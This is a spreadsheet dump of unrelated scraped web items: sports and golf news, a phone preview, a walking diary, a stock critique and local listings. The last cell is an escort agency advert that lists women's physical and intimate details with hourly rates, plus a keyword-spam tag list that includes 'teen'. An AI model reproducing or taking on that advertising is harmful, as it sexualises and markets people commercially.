“When we got off the plane, the fans were already there on the tarmac. You had to get escorted out by the police. People were queuing up for pictures and the second the players got off the bus, they were being mobbed. “It was probably the first time we have ever travelled with security. The reception was everything the girls deserve for all the sacrifices they make.” The women’s squad had an official team bus which took them around Boston Jepson said her players had to “pinch themselves at times” as they chatted with Klopp’s team and revelled in the huge support across the States. “When we got back on the plane to fly home, some of the guys came over and asked the girls how the tour had gone and how training was going,” said Jepson. “That interaction was really positive. “It was a bit surreal but we remained professional. Hopefully the club saw that and loads of things will come off the back of it.” The highlight, Jepson says, was when the women’s team came on to the pitch at half-time in the men’s game against Borussia Dortmund in Indiana. “The whole crowd were chanting ‘Liverpool Women!'” said Jepson. “That was a different experience for our players, and myself, to hear a whole stadium chanting the name of a women’s team. “It was a bit overwhelming but it was something we embraced. The club saw that women’s football is actually growing quickly and it has the support – especially in the US off the back of the success of their national team [who won a record fourth World Cup in July].” The squad were introduced to the crowd at the Notre Dame University stadium at half-time of the men’s 3-2 defeat by Dortmund and in Boston as the men lost 2-1 to Sevilla. ‘Klopp is obsessed with football’ While the players were rubbing shoulders, Jepson was learning from one of the world’s best managers – and was encouraged by his support of the women’s team. “I sat on a panel with Jurgen and chatted with him loads in bars! He was really supportive,” said Jepson. “He doesn’t change behind the scenes. He is really keen on being the players’ friend but not their best friend. “I remember walking into a bar in New York and he picked me up and gave me a big bear hug, asked how things were going and talked me through it.” Jepson says Klopp is big on the idea of Liverpool being “one club” and takes time out of his schedule to speak to colleagues and work on community projects. “He is obsessed with football, wants to get the best from his players and he really does care about the club,” she said. “Obviously his priorities are with the men’s side but he was really welcoming. He is a really good role model and a good ambassador to lead us to success.” ‘It was a breath of fresh air’ Ashley Hodson and Courtney Sweetman-Kirk scored in a 2-2 draw with Cleveland Ambassadors at Notre Dame University Jepson says there was a different level of “respect” for the female players in the US – something she thinks her players deserve at home. “The facilities we played in were outstanding. They really looked after us,” she said. “It was a breath of fresh air to get that support. In England we get pushed to one side. We are not a priority. In the US, they were in awe of what we were doing but I guess that’s just their opinion of women’s soccer. “Hopefully off the back of the World Cup [the situation at home] will change.” The women watched all three of Liverpool’s men’s matches in Boston, New York and Indiana Jepson says there were “so many fantastic outcomes” from the joint tour that the club are already considering doing the same next season. “This time last year we didn’t have the best reputation as a women’s set-up,” she said. “There was a period where the game probably outgrew our club. Now we are being taken seriously [within the club] from the men’s side. “We have managed to put ourselves in a very good position.” Liverpool Women take on Reading on Sunday, 8 September in their opening game of the Women’s Super League season at Tranmere’s Prenton Park.</t>
  </si>
  <si>
    <t>10.44am 22nd July 2019 – Courses – This story was updated on Monday, July 22nd, 2019 Thorpeness Golf Club and Hotel, part of The Hotel Folk group of luxury hotels, has teamed up with Peter Finch and The Jazzy Golfer to showcase Thorpeness, Suffolk as a leading UK golf break destination. This new commercial partnership will see Peter Finch and Jasmine (The Jazzy Golfer) create exclusive video and social media content at Thorpeness and share it worldwide with more than 400,000 subscribers on digital platforms, including YouTube, Facebook, Twitter and Instagram. Peter Finch Brad McLean, General Manager at Thorpeness Golf Club and Hotel, said: “We are excited to be working with Pete and Jasmine to shine a light on Thorpeness Golf Club and Hotel as one of Britain’s best places to take a golf break. More people use mobiles, tablets and apps now than read magazines or newspapers, so it makes sense to team up with two of the most watched digital influencers in golf. Pete and Jazzy have big plans and lots of fun in store, so check out their channels and subscribe to follow all their adventures on the Suffolk Coast this summer.” Finch, a qualified PGA Professional, will be filming a brand-new series of instructional videos at Thorpeness’ James Braid designed championship course this month. The videos will be broadcast over an eight-week period in July and August to his 200,000+ YouTube subscribers and social media followers. Finch said: “I’m excited to partner with Thorpeness Golf Club and The Hotel Folk to help people discover more about golfing on the Suffolk Coast. Suffolk is only two hours from London and boasts incredible coastal and heathland golf courses as well as picture-perfect holiday villages like Thorpeness and Aldeburgh. It’s going to be great fun hanging out with Jazzy and filming our golfing adventures by the sea.” In September, Finch will be joined by Jasmine for a unique head to head weekend at Thorpeness Golf Club and Thorpeness Country Club. The Jazzy Golfer The pair will face-off in an 18-hole challenge match around Thorpeness’ 6,311-yard heathland course, currently ranked #83 in the UK by National Club Golfer magazine, then tackle a series of quirky mini-challenges including adventure-golf and rowing on the Thorpeness Meare boating lake. Jasmine said: “Thorpeness is famous for being a wonderfully unusual English seaside village with a floating house in the clouds, windmills and has a stunning lake that inspired the children’s story Peter Pan. Pete and I are very excited to showcase these beautiful and unique aspects in our content and help Thorpeness attract more golfers to play along the Suffolk Heritage Coast.” Jasmine only took up golf in 2017, but has fallen in love with the sport and quickly become one of the UK’s biggest advocates for growing the women’s game. As well as having over 40,000 followers across her social media channels, she has worked with both the European Tour and Ladies European Tour presenting their social media content and is one of the official presenters at the Solheim Cup at Gleneagles in September. Thorpeness Golf Club and Hotel is preparing to celebrate its centenary year in 2023 and was recently confirmed as the venue for the 2021 Logan Trophy, the English Men’s Open Mid-Amateur Stroke Play Championship. Source link</t>
  </si>
  <si>
    <t>12.50pm 25th July 2019 – Management Topics – This story was updated on Friday, July 26th, 2019 New research carried out by business students at Northumbria University is set to help struggling golf clubs across the North of England to futureproof their operations and drive revenue. Keen to grow golf tourism in the area and tackle the financial challenges facing local clubs, the Northern branch of the Golf Club Managers Association (GCMA), approached the Business Clinic at Northumbria University for help. The GCMA is the UK body which represents and provides professional support to 1,800 golf clubs across the country. It recently identified a two-year stagnation in financial performance for many of its members in the North. The Business Clinic is an education scheme which brings students together to form a ‘consultancy firm’ with aim of solving a specific business issue and provide free advice to clients. Working on a project basis, the students analyse the problem, consider potential solutions and provide a detailed report with a full presentation of their recommendations to the client. Sterling Consultancy, a team of four final year business students took on the challenge, researching and reviewing the current marketing and event management activities of various clubs across Cleveland, Cumbria, Northumberland, North Durham and Tyne and Wear. With the number of golfers taking to the fairways across the country in decline, the students analysed the state of the UK golf market and then researched the approach of clubs in the North and Scotland that are thriving in comparison to their counterparts. Through extensive market research, competitor analysis and interviews with club managers and golfers across the age spectrum, the team identified a lack of exposure regionally and nationally for Golf Tourism in the Northern Region when compared to Scotland and southern counties. Club marketing efforts were insufficient with digital marketing and engagement through social media underutilised and inconsistent. There are frequent failures to maximise the value and reach of digital marketing with many websites in poor working order or lacking functionality across mobile devices. To address the issues identified, Sterling Consultancy devised a range of practical recommendations to drive greater participation in golf for local people and visitors, to ultimately increase club membership, revenue and sustainability. This included taking a collaborative approach with clubs working together to offer golf holiday packages across multiple courses. Peter Jobe, regional manager, Northern GCMA, said: “The golf industry has changed enormously. Traditionally marketing was never a major requirement; the sport was always popular attracting members of all ages. The upshot is that now, clubs really need to operate like a business and where internal marketing skills and resources are in short supply, they need to be developed in order to appeal and engage with today’s younger, digitally savvy audience. “I’ve been extremely impressed by the students’ report and recommendations. The team identified valid, inexpensive solutions to help managers to grow and run a profitable business. They understood the brief and provided an excellent level of information and knowledge for us to share with members. We are now considering taking the report to the next level by developing a social media marketing strategy and Northern Golf Week events.” Speaking on behalf of Sterling Consultancy, Business with International Management student Abby Wiffen, 23 from Cambridgeshire, said: “This was genuine work experience for us. As a team, we developed a good client relationship with Peter and I think we have presented real solutions that will add value to clubs and bring tourism benefits to the local economy.” Following the success of project, Peter is now actively looking at the feasibility of putting a business student intern into a golf club to produce a marketing programme which could be adopted by most golf clubs through Northumbria University’s Santander Internship programme. Nigel Coates, Business Clinic director, said: “We have been delighted to work with the Northern region of the GCMA. They approached us for support in proactively tackling a very real issue for golf clubs in our region. “The Business Clinic is committed to making a positive impact on our clients, and our goal is always to provide a real solution to the issue being confronted. We have the knowledge and expertise to support organisations across all sectors, and have been successful in working with businesses both regionally and nationally.” GCMA http://www.gcma.org.uk Pictured top from left: Northumbria University business students James Smith, Abby Wiffen and James Sopp with Peter Jobe and John Hall from the GCMA Northern Region and fellow student Fraser Mai Source link</t>
  </si>
  <si>
    <t>We review products independently, but we may earn affiliate commissions from buying links on this page. Terms of use. Asus’s newest smartphone, the ROG II, has almost every high-end spec you can imagine, from a 120Hz AMOLED screen and Qualcomm’s newest Snapdragon 855 Plus processor to 12GB of RAM and two USB-C ports. You might call Asus’s latest attempt to produce a gaming-focused smartphone overkill, but the device is designed to appeal to hardcore gamers looking for the best performance. “The ROG Phone II incorporates everything we’ve learned from our first foray into high-end gaming phones and then some to create another pocketable gaming powerhouse,” the company said in today’s announcement. That first foray was pretty impressive, but the second-gen model takes the specs up a notch. The result is an even bigger device, which boasts a 6.59-inch screen and weighs in at over half a pound. The new model also addresses two gripes we had with the first ROG phone: poor battery life and the odd, off-center placement of the rear fingerprint sensor. You’re now getting a 6000mAh battery over last year’s 4,000mAh capacity, and a fingerprint sensor conveniently embedded under the phone’s screen. Asus also thought having one USB-C port wasn’t enough, so it added second one, which supports DisplayPort 1.4 and USB 3.1 Gen 2 connections. There’s also a third Asus proprietary port, which can connect to the company’s accessories, including its gaming pad, desktop docking station, and a fan cooler. Other specs include the 12GB LPDDR4X RAM, either 128GB of storage or 512GB UFS 3.0 flash storage, and a 3.5mm headphone jack. In the back of the phone is a dual-lens 48MP and 13MP camera system. However, the ROG II doesn’t have every cutting-edge smartphone feature. For instance, you won’t find an edge-to-edge screen here. Instead, the product sports bezels on the top and bottom of the screen to house the twin speakers and a front-facing camera. The bezels also prevent your grip from accidentally interfering with the screen when you game two-handed. There’s no word on price or if the phone will support 5G connections. But you can expect it to be expensive when it arrives in September. The last-generation ROG phone cost $899 unlocked. Source link</t>
  </si>
  <si>
    <t>Terra Lightfoot discusses her latest album New Mistakes and joins us in the q music studio for a special stripped-down performance with just her voice and her guitar.</t>
  </si>
  <si>
    <t>Insurance Bureau of Canada (IBC) will assist in identifying stolen high-end vehicles that police believe were being prepped to be shipped overseas in containers to China and European countries. Each year, auto theft causes Canadians close to $1 billion, IBC… The post IBC aids in $2.2-million stolen vehicle investigation appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>Emergency services rushed to a city pub last night after a person took unwell.</t>
  </si>
  <si>
    <t>Alexandra Humphries</t>
  </si>
  <si>
    <t>Is it appropriate to call an MP "unladylike" in Parliament? That was the unexpected question raised on Wednesday when a fiery exchange led Tasmania's Speaker to brand the deputy Opposition leader as just that.</t>
  </si>
  <si>
    <t>Coors Light and Mixmag present My Nu Leng &amp; MC Dread in The Lab LDN. http://www.mynuleng.com/ The Lab is powered by Void Acoustics: http://voidacoustics.com/ Tommy and Jammo, alongside Dread MC, brought a high-energy set to Mixmag HQ, playing anything from bass-heavy rumbles to rolling beats and vocal edits. Listen to their two-hour monthly show on […] The post MY NU LENG in The Lab LDN appeared first on Dubster.</t>
  </si>
  <si>
    <t>Pindan Homes and Pindan Projects General Manager Simon Greenlaw</t>
  </si>
  <si>
    <t>While the cost structures and regulations are different between our commercially focused Pindan Projects and residentially focused Pindan Homes, both work to the same ethos and under the same guidance.</t>
  </si>
  <si>
    <t>Jacinta Cantatore</t>
  </si>
  <si>
    <t>Visitors to Australind will be welcomed with artwork which reflects the diverse landscape and people of the area following a decision by Harvey Shire Council.</t>
  </si>
  <si>
    <t>janet</t>
  </si>
  <si>
    <t>Day 101 of the End to End led onto the Black Isle. It was grey and overcast when we left Drumnadrochit, which had been our base since the beginning of the week. Rain was promised. I started walking at the Coastguard HQ in heavy drizzle. By the time I made it onto the Kessock bridge that had turned to heavy rain. There was zero visibility. The amount of water lying on the road meant lorries and buses created a wave each time they passed me. The rain got heavier. By the middle of the bridge, when I saw 2 Joglers coming towards me on heavily laden bikes, I was drenched. Thankfully Bob had parked at the first lay-by after the bridge. A change of clothes, a toasted sandwich and hot chocolate and I was good to go again. I walked down the steps to North Kessock, the village at the slip way across the Moray Firth. Ferries do not run since the bridge was built, and the old ticket office is currently being transformed into a local heritage project. There was a warm welcome there and I had a look round. Outside there’s a new garden with lovely coastal views. I walked on towards Munlochy, stopping first at the now closed Black Isle Wild Life Park. Hannah and I had visited this attraction 16 years ago when Bob was walking LEJOG. Nevertheless we had our sandwich there for old times sake. There were plenty of slugs on the prowl and also fungi under the fine lines of beech trees that lined the road. At Munlochy there was a small weather station by the old mill which suggests they take meteorological conditions seriously in these parts. On the way to our new accommodation, the Ryefield Farm Bunk House, we stopped at the Munlochy Cloutie Well. I have seen examples of this old Celtic Tradition before but this was probably the most extensive. Originally based around a small spring, there are numerous objects hanging from the trees there for some distance. It is also obviously the focus of frequent visits. From Psalm 100 Know that the God is Creator! God made us and we belong to God as sheep belong to the Shepherd. I don’t choose to put my trust in stuff that rots and decays like musty washing left out too long on a line. I trust the Living One, who attends me constantly; beside me, within me. God grant a quiet night and a peaceful end. JAL 27.07.2019 Day 101 of the End to End, Inverness to Munlochy.</t>
  </si>
  <si>
    <t>Liam Mannix</t>
  </si>
  <si>
    <t>A one-jab vaccine that protects you for from the flu for life. It’s the Holy Grail. Researchers around the world have been working towards it for decades. Hundreds of millions of dollars have been spent. Yet - we have nothing. Which raises the question: why do we continue to fail?</t>
  </si>
  <si>
    <t>Serena Eshaghurshan</t>
  </si>
  <si>
    <t>By: Serena Eshaghurshan PDF Version: Application for Mistrial and Judicial Recusal Denied Case Commented On: R v JNS, 2019 ABQB 557 (Can LII) In July 2019, the Honourable Mr. Justice Steven N. Mandziuk of the Court of Queen’s Bench of … Continue reading →</t>
  </si>
  <si>
    <t>Health officials in Quebec are revisiting the place of the grilled cheese sandwich on menus in care facilities.</t>
  </si>
  <si>
    <t>Vanessa Williams</t>
  </si>
  <si>
    <t>Benjamin Law embarks on a deeply personal journey to uncover his ancestral roots in a new docuseries.</t>
  </si>
  <si>
    <t>11.13am 31st July 2019 – Corporate – This story was updated on Wednesday, July 31st, 2019 59club, the industry’s leading Sales &amp; Customer Service analysts, with more than 12 years’ experience in the hospitality sector, has announced a partnership with the UK’s premier draught cocktail brand, Gunners to Drive F&amp;B Service Standards Jacques Hobson – Manager of Sam’s Clubhouse at The Belfry 59club’s unrivalled mystery shopper audits and customer satisfaction surveys launched to the Food &amp; Beverage sector in the spring in order to provide comprehensive &amp; totally objective on-line reports, which measure the customer experience in four distinct types of food delivery. They are “Food to go”, “Quick Service”, “Gastro/Brasserie” and “Premium Dining” with supplementary training services available. Each food outlet tested has the option to choose the competitors that they would like to be ranked against, with the objective being to ensure that 59club maximises the commercial opportunity and provide support where necessary. 59club food services play a vital part in ensuring that the desired sales &amp; service standards are achieved. Further plans set to advance sales &amp; service levels within the Food industry include the launch of an ‘F&amp;B Service Excellence’ qualification for customer facing staff in late 2019. To enable the rapid growth of service &amp; sales performance management tools that are driving standards across the industry, 59club has created a small network of Food &amp; Beverage Partners who share the common goals of wanting to develop products and services that serve to enhance customer experience. Gunners are the first major supporter of this initiative and have put a great offering together for golf clubs to have the drink available to members and guests on draught, in bottle and by portable dispense. Established in 1842, Gunners is famed for being a distinctive non-alcoholic cocktail. Gunners ‘Saint’, one of the most refreshing summer drinks, includes Ginger Beer, Ginger Ale, Angostura Bitters and a twist of lime, always served over ice. Gunners ‘Saint’ is now accompanied by Gunners ‘Sinner’; a modern, darker version of the classic drink that comes complete with a shot of dark rum, to add a little more punch (4.5% abv). Rather than being hand mixed behind the bar, both drinks are now available in pre-mixed packaging and poured through modern dispense equipment, so that a perfect serve is achieved, every time, in a fraction of the time. The new pairing has since seen the refreshing, British taste of Gunners added to The Belfry Hotel &amp; Resort, one of the most popular golfing venues in the UK. The fit forged around quality, affords the perfect accompaniment of beverages to meet the demands of both the traditional and modern-day golfer. 59club’s rich heritage in golf saw an early paring with the 4-time Ryder cup host venue some 12 years ago. This year the Resort was crowned 59club’s Ultimate Golf Resort in the 9th annual Service Excellence Awards Ceremony hosted in March 2019 at St Andrews, Scotland – the home of golf. Simon Wordsworth, CEO of 59club said; “We look forward to a successful partnership with Gunners, set on advancing customer service levels across golf resorts, hotel chains, restaurants and bars. If that wasn’t enough, perhaps to see the famous drink pave its way into more golf bars around the globe will be something we all toast at the first 59club Food Service Excellence Awards Ceremony.” Whether you favour the ‘Saint’ or the ‘Sinner’, visit www.gunnerscocktails.co.uk to find out more about this unique cocktail. For more information about 59club’s sales &amp; service performance management tools, contact Mike Bell for all F&amp;B related enquires at mbell@59clubfood.com and Matt Roberts for Golf, Leisure, Spa &amp; Hotels at matt@59club.com Suppliers interested in partnering with 59club to further advance sales &amp; service within the hospitality industry are urged to contact Paul Walker on behalf of 59club who can be contacted on paulwalker@pwcl.co.uk Visit 59club’s Premium Entry in The GOOD Directory Source link</t>
  </si>
  <si>
    <t>Giants defender Adam Kennedy is a chance to play just days after being hospitalised by a heart issue.</t>
  </si>
  <si>
    <t>Update to this story. MCCAIN: “You’re talking about Trump supporters, comparing them to Nazis in Nuremberg, that — that sounds extreme to me as well. When Democrats come on here and wax poetic about extremism — I’m not saying Trump isn’t doing it — but you’re calling everybody who was in that North Carolina rally […]</t>
  </si>
  <si>
    <t>Noel Towell</t>
  </si>
  <si>
    <t>Big money projects have helped win elections, but spell long-term danger for states' finances, ratings agency warns.</t>
  </si>
  <si>
    <t>Ideanomics (NASDAQ: IDEX) is a small company that appears to have an identity crisis. It previously operated in the “video on demand” niche. However, since then, it has evolved into a holding company with a wide range of operations from blockchain and AI to crude oil trading. Still, in my view, IDEX’s recent transition towards fintech has virtually nothing tangible to offer to investors. Thus, I believe it’s probably best to outright avoid the stock. Source: Picante. Overview Ideanomics is an interesting company that has changed over the years in very peculiar ways. You see, IDEX is, on paper, a video content distributor through its YOD segment. However, in practice, this segment appears to be discontinued as it no longer produces any material revenues for the company (about 0%). So what does IDEX do? Well, it’s not that clear. According to management, in 2017, IDEX ditched its focus on YOD to pivot to fintech. This was an intriguing decision because it coincided with the bitcoin bubble of 2017. After all, IDEX had nothing to do with fintech or blockchain before this development. Source: IDEX, 2018, 10-K filing. IDEX has a complicated corporate structure. Also, the VIE arrangement offers little transparency to shareholders. So, one could argue that IDEX pivoted because it was jumping into the hot new trend of the moment (reminiscent of Kodak (KODK)). In fact, after closer inspection, there was no real business opportunity behind this decision. In my view, this is reminiscent of the dot com bubble. Back then, many companies simply added “.com” to their names and their stock prices soared. This is typical of manias, and I think that in 2017 bitcoin and blockchain were no different. Thus, quite frankly, I don’t see any other reason why IDEX made such a jump from video on demand to blockchain and fintech in 2017. So what now? Source: IDEX, 2018 10-K filing (see link above). IDEX’s primary operations are in Asia. The US accounts for less than 1% of its total revenues. The reality is that at a glance it appears that its blockchain angle is entirely improvised. After all, it has had the segment for approximately two years now, and so far there’s nothing concrete for shareholders. IDEX’s only tangible evidence of something related to blockchain or fintech is its crude oil trading segment. Yes, you read that right: IDEX (originally a VOD company) also trades crude oil now. In fact, it’s its most significant revenue contributor. Source: IDEX, 2018 10-K filing (see link above). As you can see, IDEX’s most significant revenue source is its crude oil trading segment. Why does IDEX trade crude oil? Well, management claims that this is a great learning experience for them before implementing blockchain and fintech solutions in the sector (see the link above). In my view, the tokenization of assets via blockchain is an up-and-coming market opportunity. After all, as you might expect, this can potentially reduce transaction costs, improve security, and remove intermediaries, to name a few benefits. However, these applications are still in their infancy, and so far, IDEX is no different. Nevertheless, for the time being, IDEX is now primarily a crude oil trading operation. Source: Import Genius. Amar is IDEX’s consumer electronics subsidiary. The Russian text in the cargo description translates to “Telephone apparatus (…) for cellular communications or other wireless communication networks (…).” Still, that’s not all that IDEX is doing. As you can see, the company also receives revenues from its “consumer electronics” segment. Management is also “trading” this segment (like with its crude oil operations) with the same intentions of “learning” for a potential fintech/blockchain application. However, in reality, this segment is merely importing and exporting consumer electronics, which are most likely cellphones and other wireless devices. So, why would IDEX market itself as a blockchain company? Naturally, I can’t speak about management’s state of mind when they made this decision. However, I’ll offer the reader a plausible alternative. You see, in 2017 the bitcoin bubble seduced many companies into the blockchain frenzy. At that time, anything that added “blockchain” or “coin” to its operations soared due to speculation. IDEX itself rose to a multiyear high of roughly $6 per share during the zenith of the bitcoin bubble. In my view, maybe management thought that this move would be suitable for shareholders. I suppose that over the short term it provided with some nice unrealized gains. However, I remain skeptical about IDEX’s blockchain/AI/fintech prospects. Caveat emptor. Source: IDEX, 2018 10-K filing. So how does this tie into with R&amp;D of new blockchain and fintech applications? Well, as of today, IDEX’s trading operations with crude or consumer electronics have absolutely nothing to do with blockchain or fintech. They are only a promise that someday, somehow, IDEX will develop a trading application for these tokenized assets. In a way, this reminds me of the typical biotech company that only burns cash (more on this later) in the pursuit of a breakthrough that could translate into a windfall for shareholders. I think that the concept of securitized tokens is potentially revolutionary. However, what blockchain technology is great for is for decentralization. The problem is that IDEX’s angle of developing a platform wouldn’t be decentralized. In other words, if a government wanted to shut down whatever blockchain application that IDEX develops, it would be entirely possible. You see, unlike bitcoin, IDEX’s tokens would have a single point of failure (IDEX itself). This is why I don’t think it makes sense to use blockchain when ultimately there’s going to be a centralized entity managing it. Hence, I believe that IDEX has a fundamentally flawed approach. Cash burn and valuation Ultimately, the only tangible thing that IDEX has is a phenomenal cash burn rate. For context, in 2018, the company burned almost $30 million with its negative FCF. This is a huge figure when compared to its total assets of $146 million and its cash reserves of only $2 million! In fact, the cash burn rate is so excessive that bankruptcy is a real possibility unless the company raises additional cash from debt or equity. Source: IDEX, 2018 10-K filing (see link above). As you can see, even IDEX itself acknowledges that it’s borderline bankrupt. Nevertheless, the shares appear to be trading at a premium. You see, IDEX’s book value is a mere $5.56 million. This is because its assets are inflated due to “intangibles” of $68.39 million. Thus, its tangible book value is $146.22 (assets) – $68.39 (intangibles) – $72.26 (total liabilities) = $5.57 million. Therefore, IDEX is currently trading at a whopping PB ratio of 32 while being on the verge of bankruptcy! In my view, IDEX should trade at the most at twice its book value. I believe this would still be generous, but if you price it as a call option on a successful blockchain application, I suppose it could make some sense. This would imply a fair value of $0.05 per share. However, in my opinion, IDEX’s current valuation of $1.65 per share is outright nonsensical. Source: imarticus.org. Conclusion IDEX’s blockchain and fintech intentions have so far produced nothing concrete. Based on this reason alone, I’d argue that IDEX isn’t a viable investment. However, on top of that, I think the company lacks identity and vision, which is why it changed its tune when the bitcoin bubble came along. Also, I believe that it’s trading way above any rational valuation. So, all in all, I’d advise investors to pass up on IDEX. However, I must also stress the fact that IDEX appears to trade based on hype and speculation. Thus, I’d caution investors against shorting the stock as well. After all, it’s not wise to bet against the power of a – seemingly – good story. Thank you for reading, and good luck. Disclosure: I/we have no positions in any stocks mentioned, and no plans to initiate any positions within the next 72 hours. I wrote this article myself, and it expresses my own opinions. I am not receiving compensation for it (other than from Seeking Alpha). I have no business relationship with any company whose stock is mentioned in this article.</t>
  </si>
  <si>
    <t>Tunisia‘s President Beji Caid Essebsi was taken to a military hospital on Wednesday, the son of the president said, the second health crisis for the 92-year-old leader in a month. The presidency was not immediately available for an official comment. Hafedh Caid Essebsi, the president’s son, said that Essebsi was admitted to hospital on Wednesday after he suffered the effects of last month’s crisis, confirming an earlier report on local radio. Essebsi, a major player in the country’s transition to democracy since 2011, had been admitted to hospital late last month and spent a week in hospital after suffering a “severe health crisis”. But the president has only appeared twice since leaving the hospital on July 1. Essebsi has been a prominent figure in Tunisia since the overthrow of autocrat Zine El Abidine Ben Ali in 2011, which was followed by uprisings against authoritarian leaders across the Middle East, including in nearby Libya and Egypt. Parliamentary elections are expected to be held on October 6 with a presidential vote following on November 17. They will be the third set of polls in which Tunisians can vote freely following the 2011 revolution. SOURCE: Reuters news agency Source link</t>
  </si>
  <si>
    <t>Busta Rhymes – Still Shining [hip-hop] Original Source submitted by /u/thismaybeitchief [comments] Follow us on Twitter Original Source The post Busta Rhymes – Still Shining [hip-hop] appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Ontario Halton Hills Dentists in Halton Hills 692 results for Dentists in Halton Hills, ON Market Place Dental Centre (3.1 km) 280 Guelph St Georgetown, ON, L7G 4B1 905-877-2273 Georgetown Marketplace Mall – Family &amp; CosmeticDentistry. Best Dentists in Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Downtown Georgetown Dental, Sunnyview Dental – Georgetown, King's Cove Family Dental, Pownall Janet, DDs – Still Waters Dental, Market Place Dental Centre, Mill. Kid Friendly Dental Clinic Near Halton Hills Ontario Dentistry on Sinclair is Georgetown's most trusted, family-friendly dentistry. We've been providing comprehensive dental and oral health care for over 24 years. Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, King's Cove Family Dental, Market Place Dental Centre, Young Dentistry, Oksana Locate and compare Dentists in Halton Hills ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually evoke frightening dentistry images. DR. COREY GROSSMAN, DDS 374 Guelph Street, Unit 6, Georgetown, Halton Hills, ON L7G 4B7 Since 1997 STILL WATERS DENTAL GROUP – General Dentistry, Preventative Care, Check-Ups, Dental Cleaning, Children’s Dentistry, Endodontics, Cosmetic. Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, King's Cove Family Dental, Market Place Dental Centre, Young Dentistry, Oksana M. Sawiak, Find the best Dentist in Halton Hills, ON. Discover Dentists real customer reviews and contact details, including hours of operation, Georgetown Dental Clinic Dentist in Halton Hills 211 Guelph Street, Halton Hills, ON L7G 5B5 Dentist in Halton Hills Next to.</t>
  </si>
  <si>
    <t>Welcome to escorts in Ewloe CH5, covering the whole area of Flintshire. We have escorts serving the flats, homes and local hotels in Ewloe and the surrounding Flintshire areas. Ewloe Escort Flintshire Escort Services Ewloe Escorts - Girls Who Know How to Fulfill You in Flintshire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Ewloe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Ewloe escorts are women who receive hundreds of compliments from their men because of the type of services that they provide them. There are quite a lot of escorts in the area, but not all of them can deliver what they promise. When you hire a beautiful companion tonight, only go for the best one who will compliment your personality. Go for the best escort agency and finding the best escort would not be very difficult. She can perform for you, and she can wonderfully caress you. You can evaluate the services of these ladies and compare them to the services provided by other escorts to know where these wonderful ladies stand. Escorts in Ewloe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Ewloe,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Grace Location: Ewloe (CH5 3) Nationality: Scottish Spoken Language: English, Spanish Age: 29 years old Weight: 57.7kg (127lb) (9st - 1lb) Height: 5 feet 9 inches (175.26cm) Dress Size: M Shoe Size: 38 Hair Leigh: Short Hair Color: Icy Platinum Eye Color: Blue Breast: Natural Breast Size: DD Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: Ewloe Outcall: Flintshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Grace Escort Name: Heather Location: Ewloe (CH5 3) Nationality: American Spoken Language: English, Romanian Age: 25 years old Weight: 53.2kg (117lb) (8st - 5lb) Height: 5 feet 5 inches (165.10cm) Dress Size: L Shoe Size: 43 Hair Leigh: Long Hair Color: Black Eye Color: Violet Breast: Silicone Breast Size: C Pubic Hair: All Natural Tattooed: No Piercings: Yes Smoking: Occasionally Drinking: No Availability Area: Ewloe Outcall: Flintshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Heather Escort Name: Teagan Location: Ewloe (CH5 3) Nationality: British Spoken Language: English, Dutch Age: 27 years old Weight: 45.0kg (99lb) (7st - 1lb) Height: 5 feet 5 inches (165.10cm) Dress Size: L Shoe Size: 34 Hair Leigh: Medium-Length Hair Color: Brown Eye Color: Brown Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: Yes Piercings: Yes Smoking: No Drinking: Occasionally Availability Area: Ewloe Outcall: Flintshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Teagan Escort Name: Saffron Location: Ewloe (CH5 3) Nationality: Finnish Spoken Language: English, German Age: 37 years old Weight: 61.4kg (135lb) (9st - 9lb) Height: 5 feet 7 inches (170.18cm) Dress Size: M Shoe Size: 36 Hair Leigh: Short Hair Color: Bronde Eye Color: Blue Breast: Natural Breast Size: C Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Ewloe Outcall: Flintshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Saffron Escort Name: Nina Location: Ewloe (CH5 3) Nationality: British Spoken Language: English, Spanish Age: 23 years old Weight: 50.9kg (112lb) (8st - 0lb) Height: 5 feet 5 inches (165.10cm) Dress Size: XXL Shoe Size: 38 Hair Leigh: Medium-Length Hair Color: Brown Eye Color: Green Breast: Natural Breast Size: H Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: Ewloe Outcall: Flintshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Nina Ewloe Indian Escort, Ewloe Mature Escort, Ewloe Busty Escort, Ewloe Ebony Escort, Ewloe Brunette Escort, Ewloe Walsh Escort, Ewloe British Escort, Ewloe Black Escort, Ewloe Brazilian Escort, Ewloe Irish Escort, Ewloe Porn Escort, Ewloe Young Escort, Ewloe Chinese Escort, Ewloe Spanish Escort, Ewloe Outcall Escort, Ewloe Massage Escort, Ewloe Agency Escort, Ewloe Gay Escort, Ewloe Asian Escort, Ewloe Cheap Escort, Ewloe Bisexual Escort, Ewloe Horny Escort, Ewloe Blonde Escort, Ewloe Independent Escort, Ewloe Best Escort, Ewloe Male Escort, Ewloe Female Escort, Ewloe French Escort, Ewloe Erotic Escort, Ewloe Polish Escort, Ewloe Teen Escort, Ewloe Scottish Escort, Ewloe Incall Escort, Ewloe Indian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Ewloe appeared first on Escort Info UK.</t>
  </si>
  <si>
